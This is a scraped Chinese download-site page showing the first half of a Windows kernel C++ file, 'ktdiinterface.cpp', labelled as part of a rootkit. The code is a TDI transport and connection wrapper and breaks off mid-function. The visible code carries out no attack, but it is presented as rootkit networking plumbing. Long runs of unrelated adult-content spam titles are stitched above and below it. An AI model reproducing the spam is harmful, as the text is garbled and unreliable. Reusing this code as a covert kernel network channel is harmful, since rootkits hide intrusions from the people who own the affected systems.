亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? ktdiinterface.cpp

?? 爾羅斯著名黑客寫的rootkit
?? CPP
?? 第 1 頁 / 共 2 頁
字號:
#include "KTdiInterface.h"
//#include "../KLocker/KLocker.h"

#define ALIGN_4(x) \
        (((x) & 0x00000003) ? (((x) & 0xfffffffc) + 4) : (x))



KTdiInterface::KTdiInterface()
               : m_bOpen(FALSE)
{             
  //m_dwTreatIrpsCount = 0;
  m_TreatIrpsCount = 0;

  m_nLocalPort = 0;
  m_dwLocalAddress = 0;
  
  m_hTdiTransport = NULL;
  m_pTdiTransportObject = NULL;
  m_hTdiConnection = NULL;
  m_pTdiConnectionObject = NULL;
}

KTdiInterface::~KTdiInterface()
{
  Close();
}

BOOLEAN KTdiInterface::Open(IN PWSTR pwszProtocol)
{
  //KLocker locker(&m_KSynchroObject);

  if (Close() != TRUE)
    return FALSE;

  //m_dwTreatIrpsCount = 0;
  m_TreatIrpsCount = 0;

  if (pwszProtocol != NULL)
  {
    m_pwszProtocol = new WCHAR[wcslen(pwszProtocol)+sizeof(WCHAR)];
    if (m_pwszProtocol != NULL)
    {
      wcscpy(m_pwszProtocol, pwszProtocol);
      m_bOpen = TRUE;
    }
  }
  
  return m_bOpen;
}

BOOLEAN KTdiInterface::Close()
{
  //KLocker locker(&m_KSynchroObject);

  if (m_bOpen == TRUE)
  {
    //if (m_dwTreatIrpsCount == 0)
    if (m_TreatIrpsCount.CompareExchange(0, 0) == TRUE)
    {
      m_bOpen = FALSE;

      TdiCloseConnection();
      TdiCloseTransport();

      m_nLocalPort = 0;
      m_dwLocalAddress = 0;

      delete[] m_pwszProtocol;
      m_pwszProtocol = NULL;
    
      //m_dwTreatIrpsCount = 0;
      m_TreatIrpsCount = 0;
    }
  }

  return !m_bOpen;
}

BOOLEAN KTdiInterface::TdiOpenTransport(IN USHORT wPort)
{
  PTA_IP_ADDRESS            pAddress;                               // transport address
  ULONG                     dEaLength;                              // buffer size
  PFILE_FULL_EA_INFORMATION pEaInfo;                                // pointer to ea
  NTSTATUS                  dStatus;                                // current status
  BOOLEAN                   bRes = FALSE;

  if (m_bOpen == TRUE)
  {
    TdiCloseTransport();

    m_nLocalPort = wPort;

    dEaLength = sizeof ( FILE_FULL_EA_INFORMATION ) +                 // account for ea
                sizeof ( TdiTransportAddress) +                       // account for transport
                sizeof ( TA_IP_ADDRESS ) + 1;                         // account for ip address
    dEaLength = ALIGN_4(dEaLength);
    pEaInfo = (PFILE_FULL_EA_INFORMATION) new char[dEaLength];
    if (pEaInfo)                                                      // validate pointer
    {
      RtlZeroMemory(pEaInfo, dEaLength);                              // clear eabuffer
      pEaInfo->EaNameLength = TDI_TRANSPORT_ADDRESS_LENGTH;           // size
      RtlCopyMemory(pEaInfo->EaName,                                  // copy transport name
                    TdiTransportAddress, 
                    sizeof(TdiTransportAddress));
      pEaInfo->EaValueLength = sizeof(TA_IP_ADDRESS);                 // size of data
      pAddress = (PTA_IP_ADDRESS)(pEaInfo->EaName + sizeof(TdiTransportAddress));
      pAddress->TAAddressCount = 1;                                   // number of addresses
      pAddress->Address[0].AddressLength = TDI_ADDRESS_LENGTH_IP;//sizeof(TDI_ADDRESS_IP);
      pAddress->Address[0].AddressType = TDI_ADDRESS_TYPE_IP;
      pAddress->Address[0].Address[0].sin_port = W_LITTLE_TO_BIG_ENDIAN(wPort); // local port
      pAddress->Address[0].Address[0].in_addr = 0L;//D_LITTLE_TO_BIG_ENDIAN(0x7f000001);//0L;                   // local address
      dStatus = STATUS_SUCCESS;
      dStatus = TdiOpen (                                             // open tdi device
                         m_pwszProtocol,                              // tdi device name
                         dEaLength,                                   // length of ea info
                         pEaInfo,                                     // pointer to ea info
                         &m_hTdiTransport,                            // return transport handle
                         &m_pTdiTransportObject);                     // return transport object
      if (NT_SUCCESS(dStatus))
        bRes = TRUE;
      
      delete[] pEaInfo;                                               // free buffer
    }
  }

  return bRes;
}

BOOLEAN KTdiInterface::TdiCloseTransport()
{
  TdiClose(m_hTdiTransport, m_pTdiTransportObject);
  m_hTdiTransport = NULL;
  m_pTdiTransportObject = NULL;

  return TRUE;
}

BOOLEAN KTdiInterface::TdiOpenConnection()
{
  PTA_IP_ADDRESS            pAddress;                               // transport address
  ULONG                     dEaLength;                              // buffer size
  PFILE_FULL_EA_INFORMATION pEaInfo;                                // pointer to ea
  NTSTATUS                  dStatus;                                // current status
  ULONG*                    _this;
  BOOLEAN                   bRes = FALSE;

  if (m_bOpen == TRUE)
  {
    TdiCloseConnection();

    dEaLength = sizeof (FILE_FULL_EA_INFORMATION) +                   // account for ea
                sizeof (TdiConnectionContext) +                       // account for transport
                sizeof (CONNECTION_CONTEXT) + 1;                      // account for this
    dEaLength = ALIGN_4(dEaLength);
    pEaInfo = (PFILE_FULL_EA_INFORMATION) new char[dEaLength];
    if (pEaInfo)                                                      // validate pointer
    {
      RtlZeroMemory(pEaInfo, dEaLength);                              // clear eabuffer
      pEaInfo->EaNameLength = TDI_CONNECTION_CONTEXT_LENGTH;          // size
      RtlCopyMemory(pEaInfo->EaName,                                  // copy transport name
                    TdiConnectionContext, 
                    sizeof(TdiConnectionContext));
      pEaInfo->EaValueLength = sizeof(ULONG);                         // size of data
      _this = (ULONG*)(pEaInfo->EaName + sizeof(TdiConnectionContext));
      *_this  = (ULONG)this;                                          // number of addresses
    
      dStatus = STATUS_SUCCESS;
      dStatus = TdiOpen (                                             // open tdi device
                         m_pwszProtocol,                              // tdi device name
                         dEaLength,                                   // length of ea info
                         pEaInfo,                                     // pointer to ea info
                         &m_hTdiConnection,                           // return transport handle
                         &m_pTdiConnectionObject);                    // return transport object
      if (NT_SUCCESS(dStatus))
        bRes = TRUE;

      delete[] pEaInfo;                                               // free buffer
    }
  }

  return bRes;
}

BOOLEAN KTdiInterface::TdiCloseConnection()
{
  TdiClose(m_hTdiConnection, m_pTdiConnectionObject);
  m_hTdiConnection = NULL;
  m_pTdiConnectionObject = NULL;

  return TRUE;
}

NTSTATUS 
KTdiInterface::TdiOpen(
   IN PWSTR pProtocol,
   IN ULONG dEaLength,
   IN PFILE_FULL_EA_INFORMATION pEaInfo,
   OUT PHANDLE phHandle,
   OUT PFILE_OBJECT* ppObject)
{
  UNICODE_STRING    uName;                                          // local name
  OBJECT_ATTRIBUTES ObjectAttrib;                                   // local object attribute
  IO_STATUS_BLOCK   IoStatusBlock;                                  // local io status return
  NTSTATUS          dStatus;                                        // current status

  RtlInitUnicodeString(&uName, pProtocol);                          // get device name
  InitializeObjectAttributes( &ObjectAttrib,                        // return object attribute
                          &uName,                                   // resource name
                          OBJ_CASE_INSENSITIVE,                     // attributes
                          NULL,                                     // root directory
                          NULL );                                   // security descriptor
  dStatus = ZwCreateFile(
                          phHandle,                                 // return file handle
                          GENERIC_READ | GENERIC_WRITE,             // desired access
                          &ObjectAttrib,                            // local object attribute
                          &IoStatusBlock,                           // local io status
                          0L,                                       // initial allocation size
                          FILE_ATTRIBUTE_NORMAL,                    // file attributes
                          FILE_SHARE_READ | FILE_SHARE_WRITE,       // share access
                          FILE_OPEN/*_IF*/,                             // create disposition
                          FILE_NO_INTERMEDIATE_BUFFERING/*0L*/,                                       // create options
                          pEaInfo,                                  // eabuffer
                          dEaLength );                              // ealength
  if (NT_SUCCESS(dStatus))                                          // check for valid return
  {
    dStatus  = ObReferenceObjectByHandle(                           // reference file object
                            *phHandle,                              // handle to open file
                            0, //GENERIC_READ | GENERIC_WRITE,           // access mode
                            NULL,                                   // object type
                            KernelMode,                             // access mode
                            (PVOID*)ppObject,                       // pointer to object
                            NULL );                                 // handle information
    if (!NT_SUCCESS(dStatus))                                   
    {
      DbgPrint ("KTdiInterface::TdiOpen: ObReferenceObjectByHandle is ERROR - %08x!!!\n", dStatus);
      ZwClose(*phHandle);                                           // close handle
    }
  }
  else
  {
    DbgPrint ("KTdiInterface::TdiOpen: ZwCreateFile is ERROR - %08x!!!\n", dStatus);
  }
  return ( dStatus );
}

NTSTATUS 
KTdiInterface::TdiClose(
   IN HANDLE hHandle,
   IN PFILE_OBJECT pObject)
{
  if (pObject)                                                      // validate pointers
    ObDereferenceObject(pObject);                                   // release the object

  if (hHandle)
  {
    NTSTATUS NtStatus = ZwClose(hHandle);
    if (NT_SUCCESS(NtStatus) == FALSE)                                               // close handle
      DbgPrint ("KTdiInterface::TdiClose: ZwClose is ERROR - %08x!!!\n", NtStatus);
  }
  return (STATUS_SUCCESS);
}

void KTdiInterface::TdiCallThread(IN TDI_CALL_INFO* pTdiCallInfo)
{
  KTdiInterface* _this = pTdiCallInfo->m_pThis;

  pTdiCallInfo->m_NtStatus = _this->TdiCall(pTdiCallInfo->m_pIrp, pTdiCallInfo->m_pDeviceObject, pTdiCallInfo->m_pIoStatusBlock);
  
  KeSetEvent(&pTdiCallInfo->m_kEvent, 0, FALSE);
}

NTSTATUS 
KTdiInterface::TdiCallEx( 
   IN PIRP pIrp,
   IN PDEVICE_OBJECT pDeviceObject,
   IN OUT PIO_STATUS_BLOCK pIoStatusBlock)
{
  WORK_QUEUE_ITEM WorkItem;
  TDI_CALL_INFO   TdiCallInfo;

  TdiCallInfo.m_pThis = this;
  TdiCallInfo.m_NtStatus = 0;
  TdiCallInfo.m_pIrp = pIrp;
  TdiCallInfo.m_pDeviceObject = pDeviceObject;
  TdiCallInfo.m_pIoStatusBlock = pIoStatusBlock;

  KeInitializeEvent(&TdiCallInfo.m_kEvent, NotificationEvent, FALSE); 
  ExInitializeWorkItem(&WorkItem, (PWORKER_THREAD_ROUTINE)TdiCallThread, &TdiCallInfo);
  ExQueueWorkItem(&WorkItem, DelayedWorkQueue);
  KeWaitForSingleObject(&TdiCallInfo.m_kEvent, Executive, KernelMode, FALSE, NULL);

  return TdiCallInfo.m_NtStatus;
}

NTSTATUS
KTdiInterface::TdiCallCompletion(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp,
    IN PVOID Context
    )
{
  KTdiInterface* _this = (KTdiInterface*) Context;

  if (Irp->UserIosb != NULL)
    *Irp->UserIosb = Irp->IoStatus;

  if (Irp->MdlAddress != NULL)
  {
    MmUnlockPages(Irp->MdlAddress);
    IoFreeMdl(Irp->MdlAddress);
  }

  if (Irp->UserEvent != NULL)
    KeSetEvent(Irp->UserEvent, 0, FALSE);

  IoFreeIrp(Irp);
  
  if (_this != NULL)
    --(_this->m_TreatIrpsCount);
    //InterlockedDecrement(&(_this->m_dwTreatIrpsCount));

  return STATUS_MORE_PROCESSING_REQUIRED;
}


NTSTATUS 
KTdiInterface::TdiCall( 
   IN PIRP pIrp,
   IN PDEVICE_OBJECT pDeviceObject,
   IN OUT PIO_STATUS_BLOCK pIoStatusBlock,
   IN BOOLEAN bWait,
   IN PKEVENT pkEvent)
{
  KEVENT kEvent;                                                    // signaling event
  NTSTATUS dStatus = STATUS_INSUFFICIENT_RESOURCES;                 // local status

  //InterlockedIncrement(&m_dwTreatIrpsCount);
  //InterlockedIncrement(&m_dwTreatIrpsCount);
  ++m_TreatIrpsCount;

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
日韩欧美国产不卡| 91啪亚洲精品| 精品国产一区二区国模嫣然| 夜色激情一区二区| aa级大片欧美| 亚洲女同女同女同女同女同69| 久久国产尿小便嘘嘘| 欧美一级电影网站| 调教+趴+乳夹+国产+精品| 欧美午夜精品久久久| 一区二区三区影院| 欧美综合一区二区三区| 亚洲一区在线观看免费| 不卡视频一二三| 亚洲欧洲在线观看av| 91亚洲永久精品| 亚洲资源中文字幕| 欧美日韩视频在线一区二区| 亚洲亚洲精品在线观看| 欧美日韩久久久| 蜜臀av性久久久久蜜臀av麻豆 | 国产精品欧美久久久久一区二区| 成人av在线网| 一区二区三区日韩欧美精品| 欧美影院午夜播放| 日韩国产精品久久久久久亚洲| 欧美巨大另类极品videosbest | 亚洲午夜激情网站| 欧美丰满少妇xxxxx高潮对白| 天堂va蜜桃一区二区三区| 91精品国产黑色紧身裤美女| 亚洲一本大道在线| 精品国产网站在线观看| 国产成人精品一区二区三区四区| 国产精品三级电影| 欧美在线一二三| 精品中文字幕一区二区| 国产精品毛片久久久久久| 欧美中文字幕一区二区三区亚洲| 图片区小说区国产精品视频| 欧美不卡一区二区| 不卡电影一区二区三区| 亚洲一二三区在线观看| 精品国产乱码久久久久久久| 成人免费的视频| 亚洲一区二区av在线| 久久先锋影音av| 色香蕉成人二区免费| 国产成人在线视频网站| 美女mm1313爽爽久久久蜜臀| 一区二区三区中文在线| 国产精品网站导航| 精品成人一区二区三区| 欧美一区二区日韩| 欧美精品日韩精品| 在线精品视频免费播放| 色综合久久综合网欧美综合网| 国内精品免费在线观看| 蜜桃视频第一区免费观看| 亚洲午夜一区二区| 亚洲综合小说图片| 综合久久国产九一剧情麻豆| 欧美国产精品劲爆| 久久精品综合网| 精品成人私密视频| 日韩精品一区二区三区视频 | 欧美性大战xxxxx久久久| 岛国av在线一区| 岛国一区二区在线观看| 国产精品亚洲专一区二区三区| 开心九九激情九九欧美日韩精美视频电影| 亚洲午夜精品久久久久久久久| 亚洲另类一区二区| 一区二区三区日韩精品视频| 亚洲三级小视频| 亚洲乱码中文字幕| 亚洲欧美另类小说视频| 亚洲一区二区在线免费观看视频| 亚洲美女偷拍久久| 亚洲综合色成人| 三级在线观看一区二区 | 亚洲综合小说图片| 亚洲成人你懂的| 日韩成人一区二区| 麻豆精品一区二区三区| 国产综合一区二区| 东方aⅴ免费观看久久av| 99久久伊人精品| 欧洲另类一二三四区| 欧美日韩精品二区第二页| 欧美一级免费观看| 精品成人佐山爱一区二区| 国产精品视频九色porn| 亚洲免费av高清| 日本不卡不码高清免费观看| 国产一区二区三区免费| av男人天堂一区| 欧美亚洲一区二区在线| 欧美mv日韩mv国产网站| 国产精品久久久久一区二区三区| 亚洲天堂av一区| 亚洲国产精品久久一线不卡| 蜜臀久久99精品久久久久宅男| 国产一区二区三区香蕉| 色综合久久综合网97色综合| 欧美精品在线观看一区二区| 欧美精品一区二区不卡| 亚洲天堂中文字幕| 美女视频黄频大全不卡视频在线播放| 国产综合色在线视频区| 在线观看成人小视频| 精品黑人一区二区三区久久| 中文字幕一区免费在线观看| 五月天婷婷综合| 成人性生交大片免费看中文 | 99re热视频这里只精品| 欧美一区二区三区在线观看视频| 久久久久成人黄色影片| 午夜日韩在线电影| 国产·精品毛片| 欧美性高清videossexo| 国产色一区二区| 日日夜夜精品视频天天综合网| 国产91综合网| 欧美一区二区三区免费大片 | 亚洲国产一区二区视频| 国产精品一区在线观看乱码| 欧美在线短视频| 中文字幕不卡的av| 毛片av一区二区三区| 在线免费观看日韩欧美| 欧美国产日本韩| 久久99国产精品麻豆| 欧美午夜一区二区| 国产精品麻豆一区二区| 国内成+人亚洲+欧美+综合在线| 在线亚洲免费视频| 欧美激情自拍偷拍| 国产在线精品一区在线观看麻豆| 在线观看日韩电影| 国产精品久久久久久久久免费桃花 | 欧美一区二区三区在线观看视频 | 91.xcao| 尤物在线观看一区| 成人白浆超碰人人人人| 精品播放一区二区| 男女男精品网站| 欧美视频在线观看一区| 亚洲美女精品一区| 99re这里都是精品| 最新欧美精品一区二区三区| 国内精品写真在线观看| 日韩欧美一二三区| 三级影片在线观看欧美日韩一区二区| 日本韩国欧美三级| 亚洲色欲色欲www| 91亚洲精品乱码久久久久久蜜桃| 欧美国产精品v| www.欧美亚洲| 国产精品不卡在线观看| 成人福利视频在线看| 中文字幕国产精品一区二区| 国产xxx精品视频大全| 久久久精品天堂| 国产成人免费视频| 欧美国产在线观看| 成人h精品动漫一区二区三区| 中日韩av电影| 91在线视频免费91| 亚洲精品国产a久久久久久| 欧美影院一区二区三区| 视频一区在线播放| 日韩免费成人网| 国产精品一区二区视频| 久久精品欧美日韩| eeuss影院一区二区三区| 亚洲色欲色欲www| 欧美日韩另类一区| 奇米影视一区二区三区| 精品国产3级a| 成人激情动漫在线观看| 亚洲天堂福利av| 欧美日韩久久一区| 韩国视频一区二区| 中文字幕欧美国产| 在线视频你懂得一区二区三区| 亚洲国产一区二区三区青草影视 | 国产高清精品久久久久| 国产精品亲子乱子伦xxxx裸| 91麻豆精品秘密| 视频一区二区国产| 久久精品无码一区二区三区| 99久久免费视频.com| 午夜激情综合网| 精品国产1区2区3区| 97aⅴ精品视频一二三区| 天天影视网天天综合色在线播放| 欧美成人aa大片| 日本久久电影网| 美女视频黄免费的久久|